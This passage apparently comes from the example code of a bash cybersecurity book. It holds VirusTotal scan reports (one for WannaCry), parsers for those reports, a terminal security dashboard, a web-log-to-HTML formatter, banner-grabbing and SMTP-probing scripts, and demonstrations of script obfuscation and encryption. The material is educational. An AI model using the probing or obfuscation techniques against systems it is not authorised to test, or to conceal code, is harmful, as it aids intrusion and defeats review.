"20180712"}, "Kaspersky": {"detected": false, "version": "15.0.1.13", "result": null, "update": "20180712"}, "BitDefender": {"detected": false, "version": "7.2", "result": null, "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "ViRobot": {"detected": false, "version": "2014.3.20.0", "result": null, "update": "20180712"}, "Avast": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Tencent": {"detected": false, "version": "1.0.0.1", "result": null, "update": "20180712"}, "Endgame": {"detected": false, "version": "3.0.0", "result": null, "update": "20180711"}, "Sophos": {"detected": false, "version": "4.98.0", "result": null, "update": "20180712"}, "Comodo": {"detected": false, "version": "29334", "result": null, "update": "20180712"}, "F-Secure": {"detected": false, "version": "11.0.19100.45", "result": null, "update": "20180712"}, "DrWeb": {"detected": false, "version": "7.0.33.6080", "result": null, "update": "20180712"}, "VIPRE": {"detected": false, "version": "68060", "result": null, "update": "20180712"}, "Invincea": {"detected": false, "version": "6.3.5.26121", "result": null, "update": "20180601"}, "McAfee-GW-Edition": {"detected": false, "version": "v2017.3010", "result": null, "update": "20180712"}, "Emsisoft": {"detected": false, "version": "2018.4.0.1029", "result": null, "update": "20180712"}, "SentinelOne": {"detected": false, "version": "1.0.17.227", "result": null, "update": "20180701"}, "Cyren": {"detected": false, "version": "6.0.0.4", "result": null, "update": "20180712"}, "Jiangmin": {"detected": false, "version": "16.0.100", "result": null, "update": "20180712"}, "Webroot": {"detected": false, "version": "1.0.0.403", "result": null, "update": "20180712"}, "Avira": {"detected": false, "version": "8.3.3.6", "result": null, "update": "20180710"}, "MAX": {"detected": false, "version": "2017.11.15.1", "result": null, "update": "20180712"}, "Antiy-AVL": 
{"detected": false, "version": "3.0.0.1", "result": null, "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Microsoft": {"detected": false, "version": "1.1.15000.2", "result": null, "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "SUPERAntiSpyware": {"detected": false, "version": "5.6.0.1032", "result": null, "update": "20180712"}, "ZoneAlarm": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "GData": {"detected": false, "version": "A:25.17758B:25.12706", "result": null, "update": "20180712"}, "AhnLab-V3": {"detected": false, "version": "3.13.1.21452", "result": null, "update": "20180712"}, "ALYac": {"detected": false, "version": "1.1.1.5", "result": null, "update": "20180712"}, "AVware": {"detected": false, "version": "1.6.0.52", "result": null, "update": "20180712"}, "TACHYON": {"detected": false, "version": "2018-07-12.02", "result": null, "update": "20180712"}, "Ad-Aware": {"detected": false, "version": "3.0.5.370", "result": null, "update": "20180712"}, "Malwarebytes": {"detected": false, "version": "2.1.1.1115", "result": null, "update": "20180712"}, "Zoner": {"detected": false, "version": "1.0", "result": null, "update": "20180711"}, "Rising": {"detected": false, "version": "25.0.0.20", "result": null, "update": "20180712"}, "Yandex": {"detected": false, "version": "5.5.1.3", "result": null, "update": "20180712"}, "Ikarus": {"detected": false, "version": "0.1.5.2", "result": null, "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "Fortinet": {"detected": false, "version": "5.4.247.0", "result": null, "update": "20180712"}, "AVG": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Cybereason": 
{"detected": false, "version": "1.2.27", "result": null, "update": "20180225"}, "Panda": {"detected": false, "version": "4.6.4.2", "result": null, "update": "20180712"}, "Qihoo-360": {"detected": false, "version": "1.0.0.1120", "result": null, "update": "20180712"}}, "scan_id": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd-1531411370", "sha1": "1a4e2c3bbc095cb7d9b85cabe2aea2c9a769b480", "resource": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "response_code": 1, "scan_date": "2018-07-12 16:02:50", "permalink": "https://www.virustotal.com/file/284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd/analysis/1531411370/", "verbose_msg": "Scan finished, information embedded", "total": 66, "positives": 1, "sha256": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "md5": "afaf2cdf9981342c494b28630608f74a"}
================================================
FILE: ch11/WannaCry_VT.txt
================================================
{"scans": {"Bkav": {"detected": true, "version": "1.3.0.9466", "result": "W32.WannaCrypLTE.Trojan", "update": "20180712"}, "MicroWorld-eScan": {"detected": true, "version": "14.0.297.0", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": true, "version": "14.00", "result": "Trojan.Mauvaise.SL1", "update": "20180712"}, "McAfee": {"detected": true, "version": "6.0.6.653", "result": "Ransom-O", "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "Zillya": {"detected": true, "version": "2.0.0.3593", "result": "Trojan.WannaCryptGen.Win32.2", "update": "20180712"}, "SUPERAntiSpyware": {"detected": true, "version": "5.6.0.1032", "result": "Ransom.WannaCrypt/Variant", "update": "20180712"}, "TheHacker": {"detected": true, "version": "6.8.0.5.3314", "result": "Trojan/Exploit.CVE-2017-0147.a", "update": "20180712"}, "K7GW": {"detected": true, "version": "10.53.27735", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "K7AntiVirus": {"detected": true, "version": "10.53.27740", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "TrendMicro": {"detected": true, "version": "10.0.0.1040", "result": "WORM_WCRY.A", "update": "20180712"}, "Baidu": {"detected": true, "version": "1.0.0.2", "result": "Win32.Worm.Rbot.a", "update": "20180712"}, "NANO-Antivirus": {"detected": true, "version": "1.0.116.23366", "result": "Trojan.Win32.Wanna.eoqegc", "update": "20180712"}, "Cyren": {"detected": true, "version": "6.0.0.4", "result": "W32/Trojan.ZTSA-8671", "update": "20180712"}, "Symantec": {"detected": true, "version": "1.6.0.0", "result": "Ransom.Wannacry", "update": "20180712"}, "TotalDefense": {"detected": false, "version": "37.1.62.1", "result": null, "update": "20180712"}, 
"TrendMicro-HouseCall": {"detected": true, "version": "9.950.0.1006", "result": "WORM_WCRY.A", "update": "20180712"}, "Avast": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "ClamAV": {"detected": true, "version": "0.100.1.0", "result": "Win.Ransomware.WannaCry-6313787-0", "update": "20180712"}, "Kaspersky": {"detected": true, "version": "15.0.1.13", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "BitDefender": {"detected": true, "version": "7.2", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "Paloalto": {"detected": true, "version": "1.0", "result": "generic.ml", "update": "20180712"}, "AegisLab": {"detected": true, "version": "4.2", "result": "Troj.Ransom.W32!c", "update": "20180712"}, "Rising": {"detected": true, "version": "25.0.0.20", "result": "Exploit.EternalBlue!1.AAED (CLASSIC)", "update": "20180712"}, "Ad-Aware": {"detected": true, "version": "3.0.5.370", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Emsisoft": {"detected": true, "version": "2018.4.0.1029", "result": "Trojan-Ransom.WanaCrypt0r (A)", "update": "20180712"}, "Comodo": {"detected": true, "version": "29335", "result": "TrojWare.Win32.WannaCry.jet", "update": "20180712"}, "F-Secure": {"detected": true, "version": "11.0.19100.45", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "DrWeb": {"detected": true, "version": "7.0.33.6080", "result": "Trojan.Encoder.11432", "update": "20180712"}, "VIPRE": {"detected": true, "version": "68066", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "Invincea": {"detected": true, "version": "6.3.5.26121", "result": "heuristic", "update": "20180601"}, "McAfee-GW-Edition": {"detected": true, "version": "v2017.3010", "result": "BehavesLike.Win32.RansomWannaCry.wc", "update": "20180712"}, "Sophos": {"detected": true, "version": "4.98.0", 
"result": "Troj/Ransom-EMG", "update": "20180712"}, "SentinelOne": {"detected": true, "version": "1.0.17.227", "result": "static engine - malicious", "update": "20180701"}, "F-Prot": {"detected": true, "version": "4.7.1.166", "result": "W32/WannaCrypt.D", "update": "20180712"}, "Jiangmin": {"detected": true, "version": "16.0.100", "result": "Trojan.WanaCry.i", "update": "20180712"}, "Webroot": {"detected": true, "version": "1.0.0.403", "result": "W32.Ransom.Wannacry", "update": "20180712"}, "Avira": {"detected": true, "version": "8.3.3.6", "result": "TR/Ransom.IZ", "update": "20180712"}, "Fortinet": {"detected": true, "version": "5.4.247.0", "result": "W32/WannaCryptor.H!tr.ransom", "update": "20180712"}, "Antiy-AVL": {"detected": true, "version": "3.0.0.1", "result": "Trojan[Ransom]/Win32.Scatter", "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Endgame": {"detected": true, "version": "3.0.0", "result": "malicious (high confidence)", "update": "20180711"}, "Microsoft": {"detected": true, "version": "1.1.15000.2", "result": "Ransom:Win32/WannaCrypt", "update": "20180712"}, "ViRobot": {"detected": true, "version": "2014.3.20.0", "result": "Trojan.Win32.S.WannaCry.3723264.S", "update": "20180712"}, "ZoneAlarm": {"detected": true, "version": "1.0", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "TACHYON": {"detected": true, "version": "2018-07-12.02", "result": "Ransom/W32.WannaCry.Zen", "update": "20180712"}, "AhnLab-V3": {"detected": true, "version": "3.13.1.21452", "result": "Trojan/Win32.WannaCryptor.R200572", "update": "20180712"}, "ALYac": {"detected": true, "version": "1.1.1.5", "result": "Trojan.Ransom.WannaCryptor", "update": "20180712"}, "AVware": {"detected": true, "version": "1.6.0.52", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "MAX": {"detected": 
true, "version": "2017.11.15.1", "result": "malware (ai score=100)", "update": "20180712"}, "VBA32": {"detected": true, "version": "3.12.32.0", "result": "TrojanRansom.Wanna", "update": "20180712"}, "Malwarebytes": {"detected": true, "version": "2.1.1.1115", "result": "Ransom.WannaCrypt", "update": "20180712"}, "Zoner": {"detected": true, "version": "1.0", "result": "Trojan.Wannacry", "update": "20180711"}, "ESET-NOD32": {"detected": true, "version": "17703", "result": "Win32/Exploit.CVE-2017-0147.A", "update": "20180712"}, "Tencent": {"detected": true, "version": "1.0.0.1", "result": "Trojan.Win32.WannaCry.b", "update": "20180712"}, "Yandex": {"detected": true, "version": "5.5.1.3", "result": "Exploit.CVE-2017-0147!", "update": "20180712"}, "Ikarus": {"detected": true, "version": "0.1.5.2", "result": "Trojan-Ransom.WannaCry", "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "GData": {"detected": true, "version": "A:25.17758B:25.12706", "result": "Win32.Trojan-Ransom.WannaCry.D", "update": "20180712"}, "AVG": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "Cybereason": {"detected": true, "version": "1.2.27", "result": "malicious.7c37d2", "update": "20180225"}, "Panda": {"detected": true, "version": "4.6.4.2", "result": "Trj/RansomCrypt.K", "update": "20180712"}, "CrowdStrike": {"detected": true, "version": "1.0", "result": "malicious_confidence_100% (W)", "update": "20180530"}, "Qihoo-360": {"detected": true, "version": "1.0.0.1120", "result": "Win32/Trojan.Multi.daf", "update": "20180712"}}, "scan_id": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c-1531416969", "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "resource": "db349b97c37d22f5ea1d1841e3c89eb4", "response_code": 1, "scan_date": "2018-07-12 17:36:09", "permalink": 
"https://www.virustotal.com/file/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/analysis/1531416969/", "verbose_msg": "Scan finished, information embedded", "total": 68, "positives": 61, "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "md5": "db349b97c37d22f5ea1d1841e3c89eb4"}
================================================
FILE: ch11/helloworld.c
================================================
#include <stdio.h>
/* Minimal sample program: writes a fixed greeting to stdout and exits with status 0. */
int main()
{
    static const char greeting[] = "Hello World!\n";

    fputs(greeting, stdout);
    return 0;
}
================================================
FILE: ch11/vtjson.awk
================================================
# Cybersecurity Ops with bash
# vtjson.awk
#
# Description:
# Search a JSON file for VirusTotal malware hits
#
# Usage:
# vtjson.awk <json file>
# <json file> File containing results from VirusTotal
#
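# Input file: first argument, or the sample file name when none is given.
FN="${1:-Calc_VirusTotal.txt}"
# <1> Put every engine record on its own line so awk can treat one line as
# one record. The \n in the replacement text relies on GNU sed.
sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" |
awk '
# A record looks like:
#   "Engine": {"detected": true, "version": "...", "result": "...", "update": "..."},
# <4> field 3 is the detected flag, still carrying its trailing comma
$3 == "true," {
    VIRUS = $1                                  # <5> engine name, e.g. "Bkav":
    gsub(/"/, "", VIRUS)                        # <6> drop the quotes
    # Take the verdict from the text between "result": and "update": instead
    # of from a fixed field number, so detection names that contain blanks
    # (e.g. "Exploit ( 0050d7a31 )") are reported rather than skipped.
    if (match($0, /"result": ".*", "update"/)) {
        # 11 = length of the leading   "result": "   and of the trailing   ", "update"
        RESLT = substr($0, RSTART + 11, RLENGTH - 22)
    } else {
        # unquoted value such as null: fall back to the single-field form
        RESLT = $7
        gsub(/[",]/, "", RESLT)
    }
    print VIRUS, "- result:", RESLT
}'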
================================================
FILE: ch11/vtjson.sh
================================================
#!/bin/bash -
#
# Rapid Cybersecurity Ops
# vtjson.sh
#
# Description:
# Search a JSON file for VirusTotal malware hits
#
# Usage:
# vtjson.sh [<json file>]
# <json file> File containing results from VirusTotal
# default: Calc_VirusTotal.txt
#
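# <1> One engine record per line is expected, e.g.
#   "Bkav": {"detected": true, "version": "...", "result": "...", "update": "..."},
# capture 1 = engine name, 2 = text holding the detected flag, 3 = result name
RE='^.(.*)...\{.*detect..(.*),..vers.*result....(.*).,..update.*$'
FN="${1:-Calc_VirusTotal.txt}"
# <2> split the single-line JSON into one record per line (GNU sed: \n)
sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" |
# -r keeps backslashes as data; the default IFS still trims the leading
# blank that the sed step puts in front of the first record
while read -r ALINE
do
    if [[ $ALINE =~ $RE ]]                      # <3>
    then
        VIRUS="${BASH_REMATCH[1]}"              # <4>
        FOUND="${BASH_REMATCH[2]}"
        RESLT="${BASH_REMATCH[3]}"
        if [[ $FOUND =~ .*true.* ]]             # <5>
        then
            # Quoted output: detection names come from the report and can hold
            # glob characters such as [Trj]; unquoted, the shell would expand
            # them against file names in the current directory.
            printf '%s - result: %s\n' "$VIRUS" "$RESLT"
        fi
    fi
done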
================================================
FILE: ch12/tagit.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# tagit.sh
#
# Description:
# Place open and close tags around a string
#
# Usage:
# tagit.sh <tag> <string>
# <tag> Tag to use
# <string> String to tag
#
# Emit <tag>string</tag>: $1 names the tag, $2 is the text placed inside it.
# The text is written as given; nothing is escaped here.
tag="${1}"
printf '<%s>%s</%s>\n' "${tag}" "${2}" "${tag}"
================================================
FILE: ch12/webdash.sh
================================================
#!/bin/bash -
#
# Rapid Cybersecurity Ops
# webdash.sh
#
# Description:
# Create an information dashboard
# Heading
# --------------
# 1-line of output
# --------------
# 5 lines of output
# ...
# --------------
# column labels and then
# 8 lines of histograms
# ...
# --------------
#
# some important constant strings
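# Terminal control sequences, captured once so the redraw loop does not have
# to run tput on every pass.
UPTOP=$(tput cup 0 0)       # <1> move the cursor to the top-left corner
ERAS2EOL=$(tput el)         # erase from the cursor to the end of the line
REV=$(tput rev)             # reverse video
OFF=$(tput sgr0)            # general reset
SMUL=$(tput smul)           # underline mode on (start)
RMUL=$(tput rmul)           # underline mode off (reset)
COLUMNS=$(tput cols 2>/dev/null)    # how wide is our window
# tput prints nothing usable when the terminal type is unset or unknown;
# without a number the %*s below would take '-' as its width and fail
[[ $COLUMNS =~ ^[1-9][0-9]*$ ]] || COLUMNS=80
# DASHES='------------------------------------'
# <2> pad a single '-' out to the window width, then turn the padding into dashes
printf -v DASHES '%*s' "$COLUMNS" '-'
DASHES=${DASHES// /-}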
#
# prSection - print a section of the screen
# print $1-many lines from stdin
# each line is a full line of text
# followed by erase-to-end-of-line
# sections end with a line of dashes
#
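#######################################
# prSection - copy a fixed number of lines from stdin to the screen.
# Globals:   ERAS2EOL (read), DASHES (read)
# Arguments: $1 - number of lines to print (default 5)
# Outputs:   each line followed by erase-to-end-of-line, then a line of
#            dashes; when stdin runs short the remaining lines are printed
#            empty so stale text from the previous pass is wiped
#######################################
function prSection ()
{
    local -i i                                  # <3>
    local aline                                 # keep the line buffer out of the global scope
    for ((i=0; i < ${1:-5}; i++))
    do
        aline=''
        # IFS= and -r show the text exactly as received: log lines keep their
        # backslashes and leading blanks instead of being altered by read
        IFS= read -r aline
        printf '%s%s\n' "$aline" "${ERAS2EOL}"  # <4>
    done
    printf '%s%s\n%s' "$DASHES" "${ERAS2EOL}" "${ERAS2EOL}"
}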
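#######################################
# cleanup - EXIT handler: stop the background pipeline and remove its
# scratch file. Does nothing unless a background job was recorded.
# Globals:   BGPID (read), TMPFILE (read)
# Outputs:   none; all output of the function is discarded
#######################################
function cleanup()                              # <5>
{
    if [[ -n $BGPID ]]
    then
        kill %1                                 # <6> job 1 is the background pipeline
        # quoted, and -- ends option parsing, so the one file named by
        # TMPFILE is removed whatever characters its name contains
        rm -f -- "$TMPFILE"
    fi
} &> /dev/null                                  # <7>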
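trap cleanup EXIT
# launch the bg process
# <8> mktemp creates the file itself under an unpredictable name; the older
# tempfile utility is not installed on every system
TMPFILE=$(mktemp) || exit 1
# <9> event counts are rendered into TMPFILE by the background pipeline;
# the log file argument is passed on only when one was given
{ bash tailcount.sh ${1:+"$1"} | \
    bash livebar.sh > "$TMPFILE" ; } &
BGPID=$!
clear
# redraw the whole dashboard in place every 3 seconds until interrupted
while true
do
    printf '%s' "$UPTOP"
    # heading:
    echo "${REV}Rapid Cyber Ops Ch. 12 -- Security Dashboard${OFF}" \
        | prSection 1
    #----------------------------------------
    {                                           # <10>
        # grep -c counts the matching lines directly
        printf 'connections:%4d %s\n' \
            "$(netstat -an | grep -c 'ESTAB')" "$(date)"
    } | prSection 1
    #----------------------------------------
    tail -5 /var/log/syslog | cut -c 1-16,45-105 | prSection 5
    #----------------------------------------
    { echo "${SMUL}yymmdd${RMUL}" \
           "${SMUL}hhmmss${RMUL}" \
           "${SMUL}count of events${RMUL}"
      tail -8 "$TMPFILE"
    } | prSection 9
    sleep 3
done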
================================================
FILE: ch12/weblogfmt.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# weblogfmt.sh
#
# Description:
# Read in Apache web log and output as HTML
#
# Usage:
# weblogfmt.sh input.file > output.file
#
# tagit - print $2 wrapped in an opening and a closing tag named by $1.
# The text is written exactly as passed in; no HTML escaping is done here.
function tagit()
{
    local tagname="${1}"
    printf '<%s>%s</%s>\n' "${tagname}" "${2}" "${tagname}"
}
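# html_escape - print $1 with the HTML metacharacters replaced by entities.
# Request lines, referrers and user-agent strings in a web log are chosen by
# whoever sent the request, so they must reach the report as text and never
# as markup. The backslash before each & keeps it literal in bash versions
# where & in a replacement stands for the matched text.
function html_escape ()
{
    local s=$1
    s=${s//&/\&amp;}        # first, so the entities added below are not re-escaped
    s=${s//</\&lt;}
    s=${s//>/\&gt;}
    s=${s//\"/\&quot;}
    s=${s//\'/\&#39;}
    printf '%s' "$s"
}
#basic header tags
echo "<html>"                                   # <1>
echo "<body>"
echo "<h1>$(html_escape "$1")</h1>"             #title
echo "<table border=1>"                         #table with border
echo "<tr>"                                     #new table row
echo "<th>IP Address</th>"                      #column header
echo "<th>Date</th>"
echo "<th>URL Requested</th>"
echo "<th>Status Code</th>"
echo "<th>Size</th>"
echo "<th>Referrer</th>"
echo "<th>User Agent</th>"
echo "</tr>"
# <2> split each log line on blanks; f12plus takes the rest of the line.
# -r keeps backslashes in the logged data as they were written.
while read -r f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12plus
do
    echo "<tr>"
    tagit "td" "$(html_escape "${f1}")"
    tagit "td" "$(html_escape "${f4} ${f5}")"   # <3>
    tagit "td" "$(html_escape "${f6} ${f7}")"
    tagit "td" "$(html_escape "${f9}")"
    tagit "td" "$(html_escape "${f10}")"
    tagit "td" "$(html_escape "${f11}")"
    tagit "td" "$(html_escape "${f12plus}")"
    echo "</tr>"
done < "$1"
#close tags
echo "</table>"
echo "</body>"
echo "</html>"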
================================================
FILE: ch13/bannergrabber.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# bannergrabber.sh
#
# Description:
# Automatically pull the banners from HTTP, SMTP,
# and FTP servers
#
# Usage: ./bannergrabber.sh hostname [scratchfile]
# scratchfile is used during processing but removed;
# default is: "scratch.file" or tempfile-generated name
#
#
#######################################
# isportopen - test whether a TCP connection to host:port can be opened.
# Arguments: $1 - host, $2 - port
# Returns:   0 when the connection opens; non-zero otherwise, including
#            when fewer than two arguments are given
#######################################
function isportopen ()
{
    if (( $# < 2 ))                             # <1>
    then
        return 1
    fi
    local host=$1 port=$2
    local -i status
    # <2> stdout and stderr are sent to /dev/null before the /dev/tcp
    # redirection is attempted, so a refused connection stays silent
    echo >/dev/null 2>&1 < "/dev/tcp/${host}/${port}"
    status=$?
    return $status
}
# cleanup - EXIT handler: delete the scratch file named by SCRATCH.
function cleanup ()
{
    # -f: stay quiet when the file is already gone
    rm -f "${SCRATCH}"
}
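ATHOST="$1"
SCRATCH="$2"
if [[ -z $2 ]]
then
    # Prefer mktemp: it creates the file itself under an unpredictable name.
    # The fixed name in the current directory is only the last resort.
    if [[ -n $(type -p mktemp) ]]
    then
        SCRATCH=$(mktemp)
    elif [[ -n $(type -p tempfile) ]]
    then
        SCRATCH=$(tempfile)
    else
        SCRATCH='scratch.file'
    fi
fi
# <3> the scratch file is removed on exit, including one named by the caller
trap cleanup EXIT
touch "$SCRATCH"                                # <4>
if isportopen "$ATHOST" 21      # FTP             <5>
then
    # i.e., ftp -n $ATHOST
    exec 3<>"/dev/tcp/${ATHOST}/21"             # <6>
    echo -e 'quit\r\n' >&3                      # <7>
    cat <&3 >> "$SCRATCH"                       # <8>
    exec 3>&-           # release the socket before the next probe
fi
if isportopen "$ATHOST" 25      # SMTP
then
    # i.e., telnet $ATHOST 25
    exec 3<>"/dev/tcp/${ATHOST}/25"
    echo -e 'quit\r\n' >&3
    cat <&3 >> "$SCRATCH"
    exec 3>&-
fi
if isportopen "$ATHOST" 80      # HTTP
then
    # NOTE(review): the probe above tests port 80 but the request goes to an
    # https:// URL -- confirm which of the two is intended
    curl -LIs "https://${ATHOST}" >> "$SCRATCH" # <9>
fi
cat "$SCRATCH"                                  # <10>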
================================================
FILE: ch13/smtpconnect.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# smtpconnect.sh
#
# Description:
# Connect to a SMTP server and print welcome banner
#
# Usage:
# smtpconnect.sh <host>
# <host> SMTP server to connect to
#
# Open one read/write TCP connection to port 25 of the host named in $1,
# send "quit", then print everything the server returns until it closes.
smtp_host="$1"
exec 3<>"/dev/tcp/${smtp_host}/25"
echo -e 'quit\r\n' >&3
cat <&3
================================================
FILE: ch14/askey.sh
================================================
# functions to convert decimal to ascii and vice-versa
# aschar - print the ascii character representation
# of the number passed in as an argument
# example: aschar 65 ==> A
#
# aschar - print the character whose code is the decimal number in $1.
# Two steps: format the number as the text \xHH, then let %b expand that
# escape into the character itself.
function aschar ()
{
    local escape_text                           # <1>
    escape_text=$(printf '\\x%02x' $1)          # <2>
    printf '%b' "$escape_text"                  # <3>
}
# asnum - print the ascii (decimal) number
# of the character passed in as $1
# example: asnum A ==> 65
#
# asnum - print the decimal code of the first character of $1.
# A leading double quote tells printf to output the numeric value of the
# character that follows it.
function asnum ()
{
    local ch="$1"
    printf '%d' "\"${ch}"                       # <4>
}
================================================
FILE: ch14/innerscript.sh
================================================
# Two fixed status lines, then the system identification from uname.
printf '%s\n' "This is an encrypted script" "running uname -a"
uname -a
================================================
FILE: ch14/logfuscate.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# logfuscate.sh
#
# Description:
# Demonstration of logic obfuscation
#
# Net effect of the whole script: it prints $1 + $2. The nested function
# definitions, the subshell bodies and the variable g only obscure that.
f="$1" #<1>
# a - body in parentheses, so it runs in a subshell; defines b, then calls it
a() (
b()
{
f="$(($f+5))" #<5>
g="$(($f+7))" #<6> g never reaches the output
c #<7>
}
b #<4>
)
# c - also a subshell body; subtracts 3 from f, then calls the nested d
c() (
d()
{
g="$(($g-$f))" #<10> changes g only
f="$(($f-2))" #<11>
echo "$f" #<12> f has had +5, -3 and -2 applied, i.e. it is back at $1 + $2
}
f="$(($f-3))" #<8>
d #<9>
)
f="$(($f+$2))" #<2>
a #<3>
================================================
FILE: ch14/oneline.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# oneline.sh
#
# Description:
# Demonstration of one-line script obfuscation
#
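# The entire script on one physical line. It has to stay on one line: with a
# line break after an echo, the following string is run as a command name
# instead of being printed.
if [[ $1 == "test" ]]; then echo "testing"; else echo "not testing"; fi; echo "some command"; echo "another command"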
================================================
FILE: ch14/readable.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# readable.sh
#
# Description:
# Simple script to be obfuscated
#
# Report whether the first argument is exactly "test", then print two
# fixed lines.
case "$1" in
    test)
        echo "testing"
        ;;
    *)
        echo "not testing"
        ;;
esac
printf '%s\n' "some command" "another command"
================================================
FILE: ch14/streamcipher.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# streamcipher.sh
#
# Description:
# A lightweight implementation of a stream cipher
# Pedagogical - not recommended for serious use
#
# Usage:
# streamcipher.sh [-d] <key> < inputfile
# -d Decrypt mode
# <key> Numeric key
#
#
source ./askey.sh # <1>
#
# Ncrypt - Encrypt - reads in characters
# outputs 2digit hex #s
#
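#######################################
# Ncrypt - encrypt one line of text.
# Each character code is XORed with the low 7 bits of the next $RANDOM value
# and printed as two hex digits. $RANDOM is a small general-purpose
# generator, not a cryptographic one.
# Globals:   RANDOM (one value consumed per character)
# Arguments: $1 - the text to encrypt
# Outputs:   the hex digits followed by a newline
# NOTE(review): a character whose code needs more than two hex digits would
# make the output ambiguous for Dcrypt -- confirm input is 7-bit text
#######################################
function Ncrypt ()                              # <2>
{
    # all working variables are local so a call cannot clobber the caller's
    # variables (the loop index i in particular)
    local TXT="$1"
    local i CHAR RAW NUM COD
    for ((i=0; i < ${#TXT}; i++))               # <3>
    do
        CHAR="${TXT:i:1}"                       # <4>
        RAW=$(asnum "$CHAR")    # " " needed for space (32)   <5>
        NUM=${RANDOM}
        COD=$(( RAW ^ ( NUM & 0x7F )))          # <6>
        printf "%02X" "$COD"                    # <7>
    done
    echo                                        # <8>
}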
#
# Dcrypt - DECRYPT - reads in a 2digit hex #s
# outputs characters
#
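#######################################
# Dcrypt - decrypt one line produced by Ncrypt.
# The text is taken two hex digits at a time; each value is XORed with the
# low 7 bits of the next $RANDOM value and printed as a character. The
# output matches the original text only when $RANDOM is in the same state
# as it was when the line was encrypted.
# Globals:   RANDOM (one value consumed per digit pair)
# Arguments: $1 - string of hex digits
# Outputs:   the decoded characters followed by a newline
#######################################
function Dcrypt ()                              # <9>
{
    # all working variables are local so a call cannot clobber the caller's
    # variables (the loop index i in particular)
    local TXT="$1"
    local i CHAR RAW NUM COD
    for ((i=0; i < ${#TXT}; i=i+2))             # <10>
    do
        CHAR="0x${TXT:i:2}"                     # <11>
        RAW=$(( $CHAR ))                        # <12> hex text to number
        NUM=${RANDOM}
        COD=$(( RAW ^ ( NUM & 0x7F )))          # <13>
        aschar "$COD"                           # <14>
    done
    echo
}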
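# start from a known state so a DECRYPT value inherited from the environment
# cannot switch the mode
DECRYPT=""
if [[ $1 == "-d" ]]                             # <15>
then
    DECRYPT="YES"
    shift                                       # <16>
fi
KEY=${1:-1776}                                  # <17>
# <18> seeding RANDOM with the key makes the sequence repeatable: the same
# key reproduces the same values, which is what lets Dcrypt undo Ncrypt
RANDOM="${KEY}"
# <19> the || test also processes a final line that lacks a trailing newline
while read -r || [[ -n $REPLY ]]
do
    if [[ -z $DECRYPT ]]                        # <20>
    then
        Ncrypt "$REPLY"
    else
        Dcrypt "$REPLY"
    fi
done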
================================================
FILE: ch14/synfuscate.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# synfuscate.sh
#
# Description:
# Demonstration of syntax script obfuscation
#
# Function named a. Function names and variable names are separate, so this
# definition and the variable a used elsewhere in the script do not collide.
a () #<1>
{
# a third a: a variable local to the function, hiding the global one inside it
local a="Local Variable a" #<2>
echo "$a"
}
# global variable a; the function a defined above is unaffected by this assignment
a="Global Variable a" #<3>
# prints the global variable
echo "$a"
# calls the function a, which prints its own local variable
a
================================================
FILE: ch14/wrapper.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# wrapper.sh
#
# Description:
# Example of executing an encrypted "wrapped" script
#
# Usage:
# wrapper.sh
# Enter the password when prompted
#
# <1> The payload: base64 text that begins with the marker openssl writes for
# salted, password-encrypted data. Until it is decrypted, the script that
# will run cannot be read from this file.
